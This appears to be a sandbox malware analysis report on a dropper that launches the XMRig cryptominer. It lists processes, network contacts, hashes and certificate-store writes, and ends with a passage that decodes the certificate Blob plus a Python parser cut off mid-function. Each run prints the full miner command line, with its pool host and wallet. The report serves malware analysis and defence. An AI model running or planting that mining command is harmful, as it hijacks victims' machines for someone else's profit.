memory/1232-30-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-31-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-32-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-33-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-34-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-35-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-36-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-37-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-38-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-39-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-40-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-41-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-42-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-43-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-44-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-45-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-46-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-47-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-48-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-49-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-50-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-51-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-52-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-53-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-54-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-55-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-56-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-57-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-58-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-59-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-60-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-61-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-62-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-63-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-64-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-65-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-66-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-67-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-68-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-69-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-70-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-71-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-72-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-73-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-74-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-75-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-76-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-77-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-78-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-79-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-80-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-81-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-82-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-83-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-84-0x00007FF605320000-0x00007FF605E23000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:07
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3552 wrote to memory of 4960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3552 wrote to memory of 4960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4960-16-0x0000026A2EC60000-0x0000026A2EC80000-memory.dmp
memory/4960-17-0x0000026A30460000-0x0000026A30480000-memory.dmp
memory/4960-18-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-19-0x0000026A304A0000-0x0000026A304C0000-memory.dmp
memory/4960-20-0x0000026A30480000-0x0000026A304A0000-memory.dmp
memory/4960-21-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-22-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-25-0x0000026A30480000-0x0000026A304A0000-memory.dmp
memory/4960-24-0x0000026A304A0000-0x0000026A304C0000-memory.dmp
memory/4960-23-0x00007FF60B940000-0x00007FF60C443000-memory.dmp
memory/4960-{26..84}-0x00007FF60B940000-0x00007FF60C443000-memory.dmp (59 dumps, all of the same range)
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided; exact duplicate of the value shown in full under behavioral9) | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided; exact duplicate of the value shown in full under behavioral9) | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1324 wrote to memory of 4168 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1324 wrote to memory of 4168 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4168-16-0x00000250FFFC0000-0x00000250FFFE0000-memory.dmp
memory/4168-17-0x0000025080030000-0x0000025080050000-memory.dmp
memory/4168-18-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-20-0x0000025090A10000-0x0000025090A30000-memory.dmp
memory/4168-19-0x00000250909F0000-0x0000025090A10000-memory.dmp
memory/4168-21-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-22-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-25-0x0000025090A10000-0x0000025090A30000-memory.dmp
memory/4168-24-0x00000250909F0000-0x0000025090A10000-memory.dmp
memory/4168-23-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp
memory/4168-{26..84}-0x00007FF7F6C20000-0x00007FF7F7723000-memory.dmp (59 dumps, all of the same range)
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided; exact duplicate of the value in the next row) | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4472 wrote to memory of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4472 wrote to memory of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2148-16-0x000001DD63BF0000-0x000001DD63C10000-memory.dmp
memory/2148-17-0x000001DD63C30000-0x000001DD63C50000-memory.dmp
memory/2148-18-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-20-0x000001DD63C70000-0x000001DD63C90000-memory.dmp
memory/2148-19-0x000001DD63C50000-0x000001DD63C70000-memory.dmp
memory/2148-21-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-22-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-25-0x000001DD63C70000-0x000001DD63C90000-memory.dmp
memory/2148-24-0x000001DD63C50000-0x000001DD63C70000-memory.dmp
memory/2148-23-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp
memory/2148-{26..84}-0x00007FF71B200000-0x00007FF71BD03000-memory.dmp (59 dumps, all of the same range)
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:10
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided; exact duplicate of the value shown in full under behavioral9) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided; exact duplicate of the value shown in full under behavioral9) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
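The "Modifies system certificate store" entries in behavioral7, behavioral9 and behavioral16 all write the same key, AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349, and the one Blob value shown in full (behavioral9) is in the certificate store's property-record layout: DWORD property id, DWORD reserved (always 1), DWORD length, then the data. Walking it yields, among other records, CERT_FRIENDLY_NAME_PROP_ID = "Sectigo (AAA)", a CERT_SHA1_HASH_PROP_ID equal to the key name, and a CERT_CERT_PROP_ID whose DER carries the subject "Comodo CA Limited" / "AAA Certificate Services". That is a public root landing in AuthRoot, the store Windows' automatic root update fills when a TLS peer chains to a root not yet cached locally, which fits the dropper's HTTPS fetch from GitHub (see Network) far better than an attacker-installed root; the signature name sounds worse than what the data shows, but that conclusion should be re-derived on every sample rather than assumed. The decoder below is an added example (not part of the sandbox report, of Windows, or of the sample) that makes the check repeatable on a Blob exported from the registry. It embeds the first nine records copied from the behavioral9 value (the 1078-byte certificate record is deliberately left out) plus a constructed blob with a placeholder certificate so the SHA-1 cross-check can be exercised offline. Property-id names are taken from wincrypt.h; the record layout is as observed in the value on this page.

```python
"""Decode the Blob value Windows writes under
SOFTWARE\\Microsoft\\SystemCertificates\\<store>\\Certificates\\<SHA-1>\\Blob
into its CERT_*_PROP_ID records and cross-check it against the key name."""
from __future__ import annotations

import hashlib
import struct

# Property IDs (wincrypt.h) for the records present in the blob in this report
PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID",
    0x0B: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0F: "CERT_SIGNATURE_HASH_PROP_ID",
    0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x19: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    0x1D: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    0x20: "CERT_CERT_PROP_ID",
    0x53: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    0x62: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}


def parse_cert_blob(blob: bytes) -> dict[int, bytes]:
    """Each record is DWORD propid, DWORD reserved (always 1), DWORD cb, then cb bytes."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, size = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"record 0x{prop_id:02x}: reserved field is {reserved}, expected 1")
        data = blob[off:off + size]
        if len(data) != size:
            raise ValueError(f"record 0x{prop_id:02x} claims {size} bytes, only {len(data)} left")
        props[prop_id] = data
        off += size
    return props


def build_blob(props: dict[int, bytes]) -> bytes:
    """Inverse of parse_cert_blob; used only to construct test data below."""
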